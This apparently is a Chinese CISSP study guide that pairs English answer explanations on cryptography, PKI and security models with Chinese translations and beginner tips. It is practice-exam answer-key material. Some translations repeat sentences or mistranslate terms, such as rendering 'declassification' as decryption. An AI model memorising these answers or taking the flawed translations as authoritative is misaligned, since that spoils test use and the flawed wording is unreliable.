不可否认性:不可否认性让行为人事后不能抵赖自己做过某事。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

数字签名、审计日志、交易记录和证书常支持不可否认性。

密码、令牌、生物特征、多因素认证都服务认证。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
学习单元 91 / PDF P1485

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

7. D. Assuming that it is used properly, the one-time pad is the only known cryptosystem that is not vulnerable to attacks. All other cryptosystems, including transposition ciphers, substitution ciphers, and even AES, are vulnerable to attack, even if no attack has yet been discovered. 8. B, C, D. The encryption key must be at least as long as the message to be encrypted. This is because each key element is used to encode only one character of the message. The three other facts listed are all characteristics of one-time pad systems. 9. C. In a symmetric cryptosystem, a unique key exists for each pair of users.

In this case, every key involving the compromised user must be changed, meaning that the key that the user shared with each of the other 19 users must be changed. 10. C. Block ciphers operate on message “chunks” rather than on individual characters or bits. The other ciphers mentioned are all types of stream ciphers that operate on individual bits or characters of a message. 11. A. Symmetric key cryptography uses a shared secret key. All communicating parties utilize the same key for communication in any direction. Therefore, James only needs to create a single symmetric key to facilitate this communication. 12. B.

M of N Control requires that a minimum number of agents (M) out of the total number of agents (N) work together to perform high-security tasks. M of N Control is an example of a split knowledge technique, but not all split knowledge techniques are used for key escrow. 13. A. An initialization vector (IV) is a random bit string (a nonce) that is the same length as the block size that is XORed with the message. IVs are used to create a unique ciphertext every time the same message is encrypted with the same key. Vigenère ciphers are an example of a substitution cipher technique. Steganography is a technique used to embed hidden messages within a binary file.

Stream ciphers are used to encrypt continuous streams of data. 14. B. Galois/Counter Mode (GCM) and Counter with Cipher Block Chaining Message Authentication Code mode (CCM) are the only two modes that provide both confidentiality and data authenticity. Other modes, including Electronic Codebook (ECB), Output Feedback (OFB), and Counter (CTR) provide only confidentiality. 7. D.

中文直译 / 整理

假设使用得当,一次性密码本是唯一已知不受攻击影响的加密系统。 所有其他加密系统,包括置换密码、替换密码,甚至AES,都存在被攻击的 可能,即使尚未发现针对它们的攻击方法。 8. B、C、D. 加密密钥的长度必须至少与待加密消息一样长。 这是因为每个 密钥元素仅用于编码消息中的一个字符。 列出的其他三个事实均为一次性密 码本系统的特征。 9. C. 在对称加密系统中,每对用户都拥有一个唯一的密钥。 在这种情况下,所有 涉及被泄露用户的密钥都必须 更改,这意味着该用户与其余19位用户共享的密钥都必须更改。 10. C. 分组密码对消息的“块”进行操作,而非单个字符或比特。 其他提到 的密码均为流密码,对消息的单个比特或字符进行操作。 11. A. 对称密钥加密使用共享密钥。 所有通信方都使用相同的密钥进行任意 方向的通信。 因此,詹姆斯只需创建一个对称密钥即可实现此通信。 12. B. M出N控制要求在总代理数(N)中至少有M个代理协同工作以执行高 安全性任务。 M出N控制是拆分知识技术的一个示例,但并非所有拆分知识技 术都用于密钥托管。

13. A. 初始化向量(IV)是一个与块大小相同的随机比特串(一次性数), 它与消息进行异或运算。 IV用于确保每次使用相同密钥加密相同消息时都生 成唯一的密文。 维吉尼亚密码是替换密码技术的一个示例。 隐写术是一种将 隐藏消息嵌入二进制文件中的技术。 流密码用于加密连续的数据流。 14. B. Galois/Counter Mode (GCM) 和 Counter with Cipher Block Chaining Message Authentication Code mode (CCM) 是仅有的两种同时提供 机密性和数据真实性保障的模式。 其他模式,包括 Electronic Codebook ( ECB)、Output Feedback (OFB) 和 Counter (CTR),仅提供机密性。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

真实性:真实性确认数据、身份或来源是真的,不是假冒的。

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

证书、签名、强认证常支持真实性。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
真实性 真实性确认数据、身份或来源是真的,不是假冒的。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 92 / PDF P1486

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

15. D. Data that is stored in memory is being actively used by a system and is considered data in use. Data at rest is data that is stored on nonvolatile media, such as a disk. Data in transit is being actively transferred over a network. 16. B, C. The Advanced Encryption Standard (AES) and Rivest Cipher 6 (RC6) are modern, secure algorithms. The Data Encryption Standard (DES) and Triple DES (3DES) are outdated and no longer considered secure. 17. B. One important consideration when using the Cipher Block Chaining (CBC) mode is that errors propagate—if one block is corrupted during transmission, it becomes impossible to decrypt that block and the next block as well.

The other modes listed here do not suffer from this flaw. 18. C. Offline key distribution requires a side channel of trusted communication, such as in-person contact. This can be difficult to arrange when users are geographically separated. Alternatively, the individuals could use the Diffie–Hellman algorithm or another asymmetric/public key encryption technique to exchange a secret key. Key escrow is a method for managing the recovery of lost keys and is not used for key distribution. 19. A. The CAST-256 algorithm is a modern, secure cryptographic algorithm. 3DES, RC4, and SKIPJACK are all outdated algorithms that suffer from significant security issues. 20. C.

A separate key is required for each pair of users who want to communicate privately. In a group of six users, this would require a total of 15 secret keys. You can calculate this value by using the formula (n * (n – 1) / 2). In this case, n = 6, resulting in (6 * 5) / 2 = 15 keys. 15. D.

中文直译 / 整理

存储在内存中的数据正在被系统主动使用,被视为正在使用的数据。 静 态数据是存储在非易失性介质(如磁盘)上的数据。 传输中的数据正在通过网 络被主动传输。 16. B、C. 高级加密标准(AES)和Rivest密码6(RC6)是现代且安全的算法。 数据加密标准 (DES) 和三重DES(3DES)已过时,不再被视为安全。 17. B. 使用密码分组链接(CBC)模式时的一个重要考虑因素是错误会传播——如果在传输过程中一 个数据块被破坏,则无法解密该数据块以及下一个数据块。 此处列出的其他模式不存在此缺陷。 传输过程中,如果一个数据块被破坏,则无法解密该数据块以及下一个数据块。 此处 列出的其他模式不存在此缺陷。 18. C. 离线密钥分发需要一个可信的旁路通信渠道,例如面对面接触。 当用户 地理分布较远时,这可能难以安排。 或者,这些用户可以使用 Diffie‑Hellman算法或其他非对称/公钥加密技术来交换密钥。 密钥托管是一 种用于恢复丢失密钥的方法,不用于密钥分发。 19. A. CAST‑256 算法是一种现代、安全的加密算法。 3DES、RC4 和 SKIPJACK 都是存在重大安全问题的过时算法。

20. C. 每对希望私密通信的用户都需要一个独立的密钥。 在六名用户组成的群 体中,这将需要总共 15 个密钥。 您可以使用公式 (n * (n – 1) / 2) 计算该值。 在此情况下,n = 6,结果为 (6 * 5) / 2 = 15 个密钥。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

对称加密:对称加密使用同一把密钥加密和解密,速度快但密钥分发难。

非对称加密:非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

同一密钥、速度快、大数据加密常对应 symmetric。

公钥加密、私钥签名是核心记忆点。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
学习单元 93 / PDF P1487

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Chapter 7: PKI and Cryptographic Applications 1. D. Any change, no matter how minor, to a message will result in a completely different hash value. There is no relationship between the significance of the change in the message to the significance of the change in the hash value. 2. B. Side-channel attacks use information gathered about a system's use of resources, electricity consumption, timing, or other characteristics to contribute to breaking the security of encryption. Brute-force attacks seek to exhaust all possible encryption keys. Known plaintext attacks require access to both plaintext and its corresponding ciphertext. Frequency analysis attacks require access to ciphertext. 3. C.

Richard must encrypt the message using Sue's public key so that Sue can decrypt it using her own private key. If he encrypted the message with his own public key, the recipient would need to know Richard's private key to decrypt the message. If he encrypted it with his own private key, any user could decrypt the message using Richard's freely available public key. Richard could not encrypt the message using Sue's private key because he does not have access to it. If he did, any user could decrypt it using Sue's freely available public key. 4. C. The major disadvantage of the ElGamal cryptosystem is that it doubles the length of any message it encrypts.

Therefore, a 2,048-bit plaintext message would yield a 4,096-bit ciphertext message when ElGamal is used for the encryption process. 5. A. The elliptic curve cryptosystem requires significantly shorter keys to achieve encryption that would be the same strength as encryption achieved with the RSA encryption algorithm. A 3,072-bit RSA key is cryptographically equivalent to a 256-bit elliptic curve cryptosystem key. 6. B. The SHA-2 hashing algorithm comes in four variants. SHA-224 produces 224-bit digests. SHA-256 produces 256-bit digests. SHA-384 produces 384-bit digests, and SHA-512 produces 512-bit digests. Of the options presented here, only 512 bits is a valid SHA-2 hash length. 7. D.

The Secure Sockets Layer (SSL) protocol is deprecated and no longer considered secure. It should never be used. The Secure Hash Algorithm 3 (SHA-3), Transport Layer Security (TLS) 1.3, and IPSec are all modern, secure protocols and standards.

中文直译 / 整理

第7章:PKI与密码学应用 1. D. 对消息的任何更改,无论多么微小,都会导致完全不同的哈希值。 消息更改的重要性与哈希值更改的重要性之间没有关联。 2. B. 旁路攻击利用有关系统资源使用、电力消耗、时序或其他特性的信息来 协助破解加密安全。 暴力破解攻击试图穷举所有可能的加密密钥。 已知明文 攻击需要同时访问明文及其对应的密文。 频率分析攻击需要访问密文。 3. C. 理查德必须使用苏的公钥加密消息,以便苏能使用自己的私钥解密。 如果他使用自己的公钥加密消息,接收方需要知道理查德的私钥才能解密 消息。 如果他使用自己的私钥加密,任何用户都可以使用理查德公开可用 的公钥解密消息。 理查德无法使用苏的私钥加密消息,因为他无法访问它。 如果他能访问,任何用户都可以使用苏公开可用的公钥解密它。 4. C. ElGamal加密系统的主要缺点是它将任何加密消息的长度翻倍。 因此, 当使用ElGamal进行加密时,一个2,048位的明文消息将产生一个4,096位的 密文消息。 5. A. 椭圆曲线加密系统只需显著更短的密钥即可实现与RSA加密算法相同 强度的加密。

一个3,072位的RSA密钥在密码学上等同于一个256位的椭圆 曲线加密系统密钥。 6. B. SHA‑2哈希算法有四种变体。 SHA‑224生成224位摘要,SHA‑256生 成256位摘要,SHA‑384生成384位摘要,SHA‑512生成512位摘要。 在本 题提供的选项中,只有512位是有效的SHA‑2哈希长度。 7. D. 安全套接层(SSL)协议已弃用,不再被认为是安全的,绝不应使用。 安全哈希算法3(SHA‑3)、传输层安全协议(TLS)1.3和IPSec都是现代且 安全的协议和标准。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

哈希本身不提供机密性;它主要用于完整性校验。

CA、RA、证书、CRL、OCSP、信任链都是 PKI 高频点。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
公钥基础设施 PKI PKI 用证书、CA、注册、吊销等机制管理公钥信任。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
学习单元 94 / PDF P1488

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

8. A. Cryptographic salt values are added to the passwords in password files before hashing to defeat rainbow table and dictionary attacks. Double hashing does not provide any added security. Adding encryption to the passwords is challenging, because then the operating system must possess the decryption key. A one-time pad is only appropriate for use in human-to-human communications and would not be practical here. 9. B. Sue would have encrypted the message using Richard's public key. Therefore, Richard needs to use the complementary key in the key pair, his private key, to decrypt the message. 10. B. Richard should encrypt the message digest with his own private key.

When Sue receives the message, she will decrypt the digest with Richard's public key and then compute the digest herself. If the two digests match, she can be assured that the message was not altered in transit. 11. C. The FIPS 186-5 Digital Signature Standard allows federal government use of the RSA, Elliptic Curve DSA, or Edwards-Curve DSA in conjunction with the SHA-3 hashing function to produce secure digital signatures. 12. B. X.509 governs digital certificates and the public key infrastructure (PKI). It defines the appropriate content for a digital certificate and the processes used by certificate authorities to generate and revoke certificates. 13. B.

Fault injection attacks compromise the integrity of a cryptographic device by causing some type of external fault, such as the application of high-voltage electricity. Implementation attacks rely on flaws in the cryptographic algorithm. Timing attacks measure the length of time consumed by encryption operations. Chosen ciphertext attacks require access to the algorithm. 14. C. HTTPS uses TCP port 443 for encrypted client/server communications over TLS. Port 22 is used by the Secure Shell (SSH) protocol. Port 80 is used by the unencrypted HTTP protocol. Port 1433 is used for Microsoft SQL Server database connections. 15. A.

An attacker without any special access to the system would only be able to perform ciphertext-only attacks. Known plaintext and chosen plaintext attacks require the ability to encrypt data. Fault injection attacks require physical access to the facility. 8. A.

中文直译 / 整理

在对密码文件中的密码进行哈希处理之前,会添加加密盐值,以抵御彩 虹表和字典攻击。 双重哈希并不能提供额外的安全性。 对密码进行加密具有 挑战性,因为操作系统必须拥有解密密钥。 一次性密码本仅适用于人与人之 间的通信,在此场景中并不实用。 9. B. 苏会使用理查德的公钥对消息进行加密。 因此,理查德需要使用密钥 对中的互补密钥——他的私钥——来解密消息。 10. B. 理查德应使用自己的私钥对消息摘要进行加密。 当苏收到消息后,她 将使用理查德的公钥解密该摘要,然后自行计算摘要。 如果两个摘要匹配, 她就可以确信消息在传输过程中未被篡改。 11. C. FIPS 186‑5 数字签名标准允许联邦政府使用 RSA、椭圆曲线 DSA 或爱德华兹 曲线 DSA 在 与SHA‑3哈希函数结合使用,以生成安全的数字签名。 12. B. X.509规范了数字证书和公钥基础设施(PKI)。 它定义了数字证书 的适当内容以及证书颁发机构用于生成和吊销证书的过程。 13. B. 故障注入攻击通过引发某种外部故障(如施加高压电)来破坏加密设 备的完整性。 实现攻击依赖于加密算法中的缺陷。 计时攻击测量加密操作所 消耗的时间。

选择密文攻击需要访问算法。 14. C. HTTPS使用TCP端口443通过TLS进行加密的客户端/服务器通信。 端 口22由安全外壳(SSH)协议使用。 端口80由未加密的HTTP协议使用。 端 口1433用于Microsoft SQL Server数据库连接。 15. A. 没有对系统进行任何特殊访问的攻击者只能执行密文仅攻击。 已知 明文和选择明文攻击需要能够加密数据。 故障注入攻击需要物理访问设施。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

哈希本身不提供机密性;它主要用于完整性校验。

签名支持完整性、真实性和不可否认性,不等于加密全文。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
数字签名 数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。
公钥基础设施 PKI PKI 用证书、CA、注册、吊销等机制管理公钥信任。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
学习单元 95 / PDF P1489

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

16. A. Rainbow tables contain precomputed hash values for commonly used passwords and may be used to increase the efficiency of passwordcracking attacks. 17. C. The PFX format is most closely associated with Windows systems that store certificates in binary format, whereas the P7B format is used for Windows systems storing files in text format. The PEM format is another text format, and the CCM format does not exist. 18. B. Certificate revocation lists (CRLs) introduce an inherent latency to the certificate expiration process due to the time lag between CRL distributions. 19. D.

The Merkle–Hellman Knapsack cryptosystem, which relies on the difficulty of factoring super-increasing sequence, has been broken by cryptanalysts. The Advanced Encryption Standard (AES), RSA, and Elliptic Curve Cryptography all remain secure today. 20. B. SSH-2 adds support for simultaneous shell sessions over a single SSH connection. Both SSH-1 and SSH-2 are capable of supporting multifactor authentication. SSH-2 actually drops support for the IDEA algorithm, whereas both SSH-1 and SSH-2 support 3DES. 16. A.

中文直译 / 整理

彩虹表包含常用密码的预计算哈希值,可用于提高密码破解攻击的效 率。 17. C. PFX 格式最常用于以二进制格式存储证书的 Windows 系统,而 P7B 格式则用于以文本格式存储文件的 Windows 系统。 PEM 格式是另一种文本 格式,而 CCM 格式并不存在。 18. B. 证书吊销列表(CRL)由于 CRL 分发之间的时间延迟,会在证书过期过程中引入固有的延迟。 证书过期过程由于 CRL 分发之间的时间延迟,会在证书过期过程中引入 固有的延迟。 19. D. 基于超递增序列分解困难性的 Merkle–Hellman 背包密码系统已被密码 分析者破解。 高级加密标准(AES)、RSA 和椭圆曲线密码学目前仍然安全。 高级加密标准(AES)、RSA 和椭圆曲线密码学目前仍然安全。 20. B. SSH‑2 在单个 SSH 连接上增加了对多个 shell 会话的支持。 SSH‑1 和 SSH‑2 都能够支持多因素认证。 SSH‑2 实际上放弃了对 IDEA 算法的支持, 而 SSH‑1 和 SSH‑2 都支持 3DES。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

哈希本身不提供机密性;它主要用于完整性校验。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
多因素认证 MFA 使用至少两类不同认证因素,提高认证可信度。
学习单元 96 / PDF P1490

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Chapter 8: Principles of Security Models, Design, and Capabilities 1. C. A closed system is one that uses largely proprietary or unpublished protocols and standards. Options A and D do not describe any particular systems, and option B describes an open system. 2. D. The most likely reason the attacker was able to gain access to the baby monitor was through exploitation of default configuration. Since there is no mention of the exact means used by the attacker in the question, and there is no discussion of any actions of installation, configuration, or security implementation, the only remaining option is to consider the defaults of the device.

This is an unfortunately common issue with any device, but especially with IoT equipment connected to Wi-Fi networks. Unless malware was used in the attack, a malware scanner would not be relevant to this situation. This scenario did not mention malware. This type of attack is possible over any network type and all Wi-Fi frequency options. This scenario did not discuss frequencies or network types. There was no mention of any interaction with the parents, which was not required with a device using its default configuration. 3. B. The Blue Screen of Death (BSoD) stops all processing when a critical failure occurs in Windows. This is an example of a fail-secure approach.

The BSoD is not an example of a fail-open approach; a fail-open event would have required the system to continue to operate in spite of the error. A fail-open result would have protected availability, but typically by sacrificing confidentiality and integrity protections. This is not an example of a limit check, which is the verification that input is within a preset range or domain. Object-oriented is a type of programming approach, not a means of handling software failure. 4. C. A constrained process is one that can access only certain memory locations. Allowing a process to run for a limited time is a time limit or timeout restriction, not a confinement.

Allowing a process to run only during certain times of the day is a scheduling limit, not a confinement. A process that controls access to an object is authorization, not confinement. 5. D. Declassification is the process of moving an object into a lower level of classification once it is determined that it no longer justifies being placed at a higher level. Only a trusted subject can perform declassification

中文直译 / 整理

第8章:安全模型、设计与能力的原则 1. C. 封闭系统是指主要使用专有或未公开协议和标准的系统。 选项A和D并 未描述任何特定系统,选项B描述的是开放系统。 2. D. 攻击者最有可能通过利用默认配置获得对婴儿监视器的访问权限。 由于 问题中未提及攻击者使用的具体手段,也未讨论任何安装、配置或安全实施 行为,因此唯一剩下的可能性是考虑设备的默认设置。 这是任何设备都可能 遇到的不幸常见问题,尤其对于连接到Wi‑Fi网络的物联网设备而言。 除非 攻击中使用了恶意软件,否则恶意软件扫描器在此情境下并不相关。 本场景 未提及恶意软件。 此类攻击可在任何网络类型和所有Wi‑Fi频段上发生,但 本场景并未讨论频段或网络类型。 也未提及与父母的任何互动,而使用默认 配置的设备无需此类互动。 3. B. 蓝屏死机(BSoD)在 Windows 发生严重故障时会停止所有处理。 这 是故障安全方法的一个示例。 BSoD 不是故障开放方法的示例; 故障开放事 件要求系统在出现错误时仍继续运行。 故障开放结果会保护可用性,但通常 以牺牲机密性和完整性保护为代价。 这也不是限制检查的示例,限制检查是 验证输入是否在预设范围或域内。

面向对象是一种编程方法,而非处理软件 故障的手段。 4. C. 受限进程是指只能访问特定内存位置的进程。 允许进程运行有限时间 是时间限制或超时限制,而非隔离。 允许进程仅在一天中的特定时间运行 是调度限制,而非隔离。 控制对对象访问的进程是授权,而非隔离。 5. D. 解密是将对象移至较低保密级别的一种过程,一旦确定其不再需要保持 在较高保密级别时即执行此操作。 只有受信任的主体才能执行解密。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

授权:授权是认证之后决定你能访问什么、能做什么。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

认证成功不等于什么都能做;权限仍要单独授权。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
授权 授权是认证之后决定你能访问什么、能做什么。
标准 标准给出必须满足的最低要求。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 97 / PDF P1491

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

because this action is a violation of the verbiage of the star property of Bell–LaPadula, but not the spirit or intent, which is to prevent unauthorized disclosure. Perturbation is the use of false or misleading data in a database management system to redirect or thwart information confidentiality attacks. Noninterference is the concept of limiting the actions of a subject at a higher security level so they do not affect the system state or the actions of a subject at a lower security level. If noninterference was being enforced, the writing of a file to a lower level would be prohibited.

